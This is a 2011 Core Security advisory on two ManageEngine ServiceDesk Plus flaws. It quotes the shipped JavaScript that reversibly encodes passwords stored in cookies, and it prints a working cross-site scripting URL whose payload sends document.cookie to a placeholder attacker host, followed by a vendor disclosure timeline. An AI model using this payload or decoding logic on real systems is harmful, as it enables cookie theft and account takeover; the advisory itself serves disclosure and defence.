PACKETSTORM:105123 (packetstormsecurity.com) - Core Security Technologies
Core Security Technologies Advisory 2011.0506
Published: 2011-09-14 00:00:00

EPSS: 0.003 (Low), percentile 67.4%

`Core Security - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
Multiple Vulnerabilities in ManageEngine ServiceDesk Plus  
  
  
1. *Advisory Information*  
  
Title: Multiple Vulnerabilities in ManageEngine ServiceDesk Plus  
Advisory ID: CORE-2011-0506  
Advisory URL:  
http://www.coresecurity.com/content/multiples-vulnerabilities-manageengine-sdp  
Date published: 2011-09-14  
Date of last update: 2011-09-14  
Vendors contacted: ManageEngine  
Release mode: User release  
  
  
2. *Vulnerability Information*  
  
Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]  
Impact: Code execution, Security bypass  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2011-1509, CVE-2011-1510  
  
  
3. *Vulnerability Description*  
  
ManageEngine ServiceDesk Plus is a web-based, ITIL-ready service desk  
application with integrated asset management, developed by ManageEngine,  
the Enterprise IT Management Software division of Zoho Corporation [1].  
  
The authentication process of ServiceDesk Plus obfuscates user passwords  
with a trivial, symmetric algorithm implemented in JavaScript and using no  
secret. Because the obfuscated password is stored in the user's cookies  
and the JavaScript that encodes and decodes it ships in a .js file, anyone  
who obtains the cookie can recover the user name and password of the  
registered user and bypass authentication.  
  
Additionally, a cross site scripting vulnerability related to search  
functions was found.  
  
  
4. *Vulnerable packages*  
  
. ManageEngine ServiceDesk Plus 8.0.0 Professional edition.  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. Contact vendor for further information.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
Regarding the vulnerability in the 'SearchSolution' page [CVE-2011-1510],  
the SDP team confirmed the issue on 2011-05-16 and fixed it in SDP 8012  
(June 2011). ManageEngine did not provide technical information, a  
workaround or a clear timeline for a fix for [CVE-2011-1509]. Please  
contact the vendor for further information and patches.  
  
  
7. *Credits*  
  
This vulnerability was discovered and researched by Matias Blanco from  
Core Security Technologies.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
8.1. *Authentication Weakness*  
  
[CVE-2011-1509] User passwords are pseudo-encrypted and stored in the  
user's cookies. The transformation is a symmetric Caesar-style shift with  
no salt or secret, and the JavaScript that encodes and decodes passwords  
is shipped to the browser in the 'Login.js' file.  
  
/-----  
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */  
...  
function encryptPassword(textPassword)  
{  
    var num_out = "";  
    var str_in = escape(textPassword);  
    for(i = 0; i < str_in.length; i++)  
    {  
        // fixed shift of 23 on each escaped character code; no key involved  
        num_out += str_in.charCodeAt(i) - 23;  
    }  
    return num_out;  
}  
  
-----/  
  
  
/-----  
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */  
...  
function decryptPassword(encPassword)  
{  
    var str_out = "";  
    var num_out = encPassword;  
    for(i = 0; i < num_out.length; i += 2)  
    {  
        // each two-digit group, shifted back by 23, is one escaped character  
        num_in = parseInt(num_out.substr(i,[2])) + 23;  
        num_in = unescape('%' + num_in.toString(16));// No I18N  
        str_out += num_in;  
    }  
    var textPassword = unescape(str_out);  
    return textPassword ;  
}  
  
-----/  
So if an attacker manages to steal the cookie, they can trivially decode  
it and recover the original password. Since the user name is also stored  
in plaintext in the cookie, this enables impersonation and identity theft.  
  
  
8.2. *Cross-Site Scripting*  
  
[CVE-2011-1510] The 'searchText' parameter of the 'SolutionSearch.do'  
page is not sanitized. An external attacker can obtain the password of an  
authenticated ManageEngine user by making this request:  
  
/-----  
https://[vulnerable_site]/SolutionSearch.do?searchText=';var  
el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);'  
-----/  
  
This request causes the victim's browser to send an HTTP request to a web  
server controlled by the attacker, 'http://[malicious_site]', carrying the  
cookie that contains the trivially decodable password.  
  
  
9. *Report Timeline*  
  
. 2011-05-12:  
Initial notification to the vendor. Publication date set to June 7th, 2011.  
  
. 2011-05-13:  
The Service Desk team asks Core for a technical description of the  
vulnerability.  
  
. 2011-05-13:  
Technical details sent to Service Desk team.  
  
. 2011-05-16:  
The Service Desk team notifies they are analyzing the [CVE-2011-1509]  
issue and it will take them some time to fix it. The issue  
[CVE-2011-1510] was identified and it will be fixed in SDP 8012, which  
is expected by the end of May 2011.  
  
. 2011-05-23:  
Core asks the vendor to clarify whether the fixes will be released  
together or in two release cycles.  
  
. 2011-05-27:  
The Service Desk team notifies the issue [CVE-2011-1510] will be fixed  
in the upcoming hotfix 8012, which is currently under validation phase  
and is expected to get released by next week. Regarding the encryption  
issue [CVE-2011-1509], the Service Desk team notifies they will have to  
work on that and will not be able to provide a fix by June 7th 2011.  
  
. 2011-06-02:  
Core states that neither the progress status nor the release date for  
the fix of [CVE-2011-1509] have been notified. Core also claims that the  
advisory publication was rescheduled to Jun 21st, and requests a clear  
timeline.  
  
. 2011-06-07:  
The Service Desk team notifies that they have not been working on this  
issue. Once the next product release is over they will get started on  
the analysis.  
  
. 2011-06-07:  
First release date missed.  
  
. 2011-06-21:  
Second release date missed.  
  
. 2011-06-23:  
Core notifies that the vulnerability was reported 5 weeks ago  
[2011-05-12], 2 release dates were already missed, and requests an  
update on the status as soon as possible in order to assess the situation.  
  
. 2011-07-08:  
Core notifies that it is not possible to keep the process coordinated  
without the requested information and reschedules the advisory to be  
published on July 19th as 'User Release'.  
  
. 2011-07-08:  
The Service Desk team notifies that they have started analyzing  
[CVE-2011-1509] and working on various solutions to get this fixed. The  
vendor also notifies that they will try to roll the patches on the 8.1  
release, which is expected in 2 months' time from now.  
  
. 2011-07-18:  
Core considers it bad practice to postpone the patch release 2 months until  
a new version of the product is available (since it may suffer  
engineering delays that have nothing to do with the reported security  
issue itself). As a result, Core offers to reschedule the advisory  
publication to Aug 9th, giving the vendor additional time to develop  
patches and/or the appropriate mitigation actions until version 8.1 is  
released.  
  
. 2011-07-19:  
Third release date missed.  
  
. 2011-08-08:  
Core requests a status update and notifies the advisory is currently  
scheduled to be published tomorrow, Aug 9th. Core also requests to  
clarify if the vendor will release fixes for previous vulnerable  
versions of ManageEngine.  
  
. 2011-08-09:  
The ManageEngine team notifies that they have not fixed the issue yet and  
that customers will have to upgrade to the latest version to get a fixed  
version of the product.  
  
. 2011-08-09:  
Fourth release date missed.  
  
. 2011-08-12:  
Core notifies that the release date was missed and requests a new  
estimated date for disclosure. Core also requests additional technical  
information regarding the fix and how the ManageEngine team is going to  
resolve the weakness in the authentication process. Core also asks  
whether customers of old versions will have to pay for the latest  
(patched) version or will be able to download free patches.  
  
. 2011-08-16:  
The ManageEngine team notifies that there could be a delay of about a  
month for a release candidate; technical details will be released once  
they decide on the final implementation. The vendor also notifies that  
the upgrade from an earlier version to a new version is free, and that a  
patch for the upgrade will be available on the site.  
  
. 2011-08-18:  
Core notifies that, given:  
1. this flaw was reported 3 months ago [2011-05-12],  
2. 4 release dates have already been missed,  
3. SDP is postponing the release of the patch until a new version of the  
product is available,  
4. and the lack of technical information about how and when SDP will  
patch this flaw;  
  
Core has decided to reschedule the advisory to Sep 13th, and this  
should be considered the final date.  
  
. 2011-09-14:  
CORE-2011-0506 is published.  
  
  
10. *References*  
  
[1] ManageEngine ServiceDesk Plus  
http://www.manageengine.com/products/service-desk.  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://corelabs.coresecurity.com.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies enables organizations to get ahead of threats  
with security test and measurement solutions that continuously identify  
and prove real-world exposures to their most critical assets. Our  
customers can gain real visibility into their security standing, real  
validation of their security controls, and real metrics to more  
effectively secure their organizations.  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
Technologies can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2011 Core Security  
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
  
`